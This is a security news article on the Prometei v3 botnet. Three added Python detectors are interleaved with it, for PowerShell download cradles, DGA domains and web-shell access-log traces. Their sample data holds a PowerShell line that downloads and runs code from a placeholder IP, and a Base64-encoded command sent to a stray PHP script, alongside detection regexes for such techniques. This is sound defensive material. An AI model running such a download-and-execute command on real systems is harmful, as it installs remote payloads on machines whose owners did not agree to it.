New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide

Mar 10, 2023 | Ravie Lakshmanan | Endpoint Security / Hacking


An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide since November 2022.

The infections are both geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey.

Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of the ProxyLogon Microsoft Exchange Server flaws.

It is also notable for avoiding targets in Russia, suggesting that the threat actors behind the operation are likely based in that country.

The cross-platform botnet's motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials.

The latest variant of Prometei (called v3) improves upon its existing features to hinder forensic analysis and further entrench its access on victim machines, Cisco Talos said in a report shared with The Hacker News.


The attack sequence proceeds as follows: upon gaining a successful foothold, a PowerShell command is executed to download the botnet payload from a remote server. Prometei's main module is then used to retrieve the actual crypto-mining payload and other auxiliary components onto the system.

Some of these support modules function as spreader programs designed to propagate the malware over Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).
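The foothold step above (a PowerShell command fetching a payload from a remote server) is the point at which defenders usually get their first process-creation telemetry. The following is an added example, not code from the report or from Cisco Talos: it scores Sysmon-style process-creation events for the combination of traits a download cradle normally shows (a download primitive, in-memory execution, a hidden window, an execution-policy bypass, or an encoded command), plus an unusual parent process such as a web server worker. The events, the indicator list and the parent-process list are all constructed for the example; the remote address is from the TEST-NET-3 documentation range.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not data from the report.
SAMPLE_PROCESS_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"host": "ws01", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"host": "srv02", "parent": "w3wp.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update')\""},
]

# (name, regex) pairs. A single token is weak evidence (admins use -ep bypass all the time),
# so the detector scores how many distinct traits co-occur in one command line.
INDICATORS = [
    ("download_primitive",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient", re.I)),
    ("in_memory_execute", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)\b", re.I)),
]

# Parents that should rarely spawn PowerShell; a web server worker is the shape a web-shell foothold takes.
# Constructed list for the example, extend it from your own baseline.
SUSPICIOUS_PARENTS = {"w3wp.exe", "httpd.exe", "php-cgi.exe"}


def is_powershell(image):
    """True when the image file name is a PowerShell host, regardless of directory."""
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    if not is_powershell(event["image"]):
        return 0, []
    matched = [name for name, rx in INDICATORS if rx.search(event["cmdline"])]
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        matched.append("suspicious_parent")
    return len(matched), matched


def find_download_cradles(events, min_score=2):
    """Return the events whose indicator count reaches min_score."""
    hits = []
    for ev in events:
        score, matched = score_event(ev)
        if score >= min_score:
            hits.append({"host": ev["host"], "score": score, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in find_download_cradles(SAMPLE_PROCESS_EVENTS):
        print(hit)
```

Only the third event reaches the threshold; the plain `Get-Process` invocation scores zero even though it is PowerShell, which is the point of scoring combinations rather than single keywords. The threshold and the parent list are the tuning knobs: raise `min_score` in environments where administrative scripts legitimately use hidden windows and policy bypasses.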

Prometei v3 is also noteworthy for using a domain generation algorithm (DGA) to build out its command-and-control (C2) infrastructure. It further packs in a self-update mechanism and an expanded set of commands to harvest sensitive data and commandeer the host.
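A DGA-built C2 infrastructure cannot be blocklisted by name, so defenders fall back on the shape of the names themselves. The block below is an added example, not code from the report: it parses constructed DNS query log lines, scores the registrable label of each name on length, Shannon entropy and vowel ratio, and reports clients that resolve several generated-looking names. The log format, the thresholds and the sample domains are all assumptions made for the example; they do not describe Prometei's actual algorithm, which the article does not detail.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log (not from the report). Format per line: "<timestamp> <client> <qname>".
SAMPLE_DNS_LOG = """\
2023-03-10T08:01:12Z 10.0.0.15 www.example.com
2023-03-10T08:01:13Z 10.0.0.15 mail.example.com
2023-03-10T08:01:14Z 10.0.0.22 xk3qzv7tpw9rbl.net
2023-03-10T08:01:14Z 10.0.0.22 qp8mzx4vwt2kjr.net
2023-03-10T08:01:15Z 10.0.0.22 rt6jvkx9pzqw3n.net
2023-03-10T08:01:16Z 10.0.0.15 cdn.example.org
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0 for the empty string)."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def second_level_label(qname):
    """The label just left of the TLD, so random CDN subdomains of a real site are not scored."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_features(label):
    vowels = sum(ch in "aeiou" for ch in label)
    digits = sum(ch.isdigit() for ch in label)
    n = len(label) or 1
    return {
        "length": len(label),
        "entropy": shannon_entropy(label),
        "vowel_ratio": vowels / n,
        "digit_ratio": digits / n,
    }


def looks_generated(label, min_len=10, min_entropy=3.2, max_vowel_ratio=0.25):
    """Heuristic: long, high-entropy, vowel-poor labels are what most character-level DGAs emit.
    Thresholds are assumptions chosen for the example; tune them against your own resolver traffic."""
    f = dga_features(label)
    return (f["length"] >= min_len
            and f["entropy"] >= min_entropy
            and f["vowel_ratio"] <= max_vowel_ratio)


def parse_dns_log(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qname = line.split()
            events.append((ts, client, qname))
    return events


def suspicious_clients(log_text, min_hits=3):
    """Map client -> sorted list of generated-looking names, for clients with at least min_hits of them.
    Requiring several distinct hits per client is what keeps a single odd hostname from paging anyone."""
    hits = defaultdict(set)
    for _ts, client, qname in parse_dns_log(log_text):
        if looks_generated(second_level_label(qname)):
            hits[client].add(qname)
    return {c: sorted(names) for c, names in hits.items() if len(names) >= min_hits}


if __name__ == "__main__":
    for client, names in suspicious_clients(SAMPLE_DNS_LOG).items():
        print(client, names)
```

Only 10.0.0.22 is reported; the `example.*` names fail the length test and a real dictionary word such as `stackoverflow` fails the vowel-ratio test. Dictionary-based DGAs defeat this particular scorer, so treat it as one signal to correlate with NXDOMAIN bursts and newly-registered-domain feeds rather than a verdict on its own.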

Last but not least, the malware deploys an Apache web server that is bundled with a PHP-based web shell, which is capable of executing Base64-encoded commands and carrying out file uploads.
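A web shell that takes Base64-encoded commands leaves a recognisable trace in the web server's own access log: requests to a PHP file that the application never shipped, carrying parameters that are valid Base64 and decode to readable text. The block below is an added example, not code from the report or from Talos: it parses constructed Apache combined-format log lines and applies those two rules. The log lines, the application's allowlist of known scripts and the parameter name are all assumptions made for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format access log lines (not real Prometei traffic).
SAMPLE_ACCESS_LOG = """\
10.0.0.15 - - [10/Mar/2023:08:02:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.15 - - [10/Mar/2023:08:02:01 +0000] "GET /report.php?id=20230310 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.22 - - [10/Mar/2023:08:02:05 +0000] "GET /img/cache.php?cmd=aXBjb25maWc%3D HTTP/1.1" 200 512 "-" "python-requests/2.28"
10.0.0.22 - - [10/Mar/2023:08:02:09 +0000] "POST /img/cache.php HTTP/1.1" 200 64 "-" "python-requests/2.28"
"""

# PHP scripts the (hypothetical) application legitimately serves; any other .php target is unexpected.
KNOWN_PHP_SCRIPTS = {"/index.php", "/report.php"}

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def decode_if_base64_text(value, min_len=8):
    """Return the decoded text if value is strict Base64 that decodes to printable ASCII, else None.
    Short values and values that decode to binary (e.g. a numeric id that happens to be Base64-shaped)
    are rejected, which keeps ordinary query parameters from matching."""
    if len(value) < min_len or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or not all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return None
    return raw.decode("ascii")


def analyze_access_log(text):
    """Return one finding dict per matched rule; unparseable lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        parts = urlsplit(rec["target"])
        if parts.path.endswith(".php") and parts.path not in KNOWN_PHP_SCRIPTS:
            findings.append({"client": rec["client"], "rule": "unexpected_php_script",
                             "method": rec["method"], "path": parts.path, "decoded": None})
        # parse_qsl also undoes percent-encoding, so %3D padding becomes '='.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = decode_if_base64_text(value)
            if decoded is not None:
                findings.append({"client": rec["client"], "rule": "base64_param",
                                 "method": rec["method"], "path": parts.path,
                                 "param": key, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in analyze_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
```

The two benign requests produce nothing: `home` is too short to count as Base64 and `20230310` decodes to non-printable bytes. The unexpected script rule fires twice for `/img/cache.php` and the parameter rule once, with the decoded value shown so an analyst can triage it without re-decoding by hand. Access logs never contain POST bodies, so the parameter rule only sees query strings; pair it with a file-integrity check on the web root for the upload side of the shell.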

"This latest addition of new capabilities [indicates] that the Prometei operators are constantly updating the botnet and adding functionality," Talos researchers Andrew Windsor and Vanja Svajcer said.
